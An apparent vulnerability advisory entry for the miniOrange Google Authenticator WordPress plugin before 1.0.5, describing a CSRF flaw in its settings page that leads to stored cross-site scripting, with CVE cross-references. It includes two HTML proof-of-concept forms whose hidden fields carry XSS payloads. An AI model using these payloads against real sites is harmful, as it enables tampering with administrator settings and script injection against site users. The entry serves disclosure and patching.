Lucene search
Niraj MahajanWPEX-ID:FEFC1411-594D-465B-AEB9-78C141B23762HistoryJun 06, 2022 - 12:00 a.m.
miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting
2022-06-0600:00:00
Niraj Mahajan
75
miniorange google authenticator
csrf
stored cross-site scripting
vulnerability
version 1.0.4
version 1.0.5
EPSS
0.001
Percentile
25.9%
The plugin does not have CSRF check when saving its settings, and does not sanitise as well as escape them, allowing attackers to make a logged in admin change them and perform Cross-Site Scripting attacks
v < 1.0.4
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
<input type="hidden" name="option" value="mo2f_gauth_appname" />
<input type="hidden" name="mo2f_gauth_issuer" value='"><img src onerror=alert(/XSS/)>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
v < 1.0.5
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
<input type="hidden" name="option" value="mo2f_gauth_appname" />
<input type="hidden" name="mo2f_gauth_issuer" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
cve
cve
CVE-2022-0875
2022-06-27 09:15:08
cnvd
cnvd
WordPress Google Authenticator plugin跨站请求伪造漏洞
2022-06-30 00:00:00
cvelist
cvelist
wpvulndb
wpvulndb
nvd
nvd
CVE-2022-0875
2022-06-27 09:15:08
prion
prion
Cross site scripting
2022-06-27 09:15:00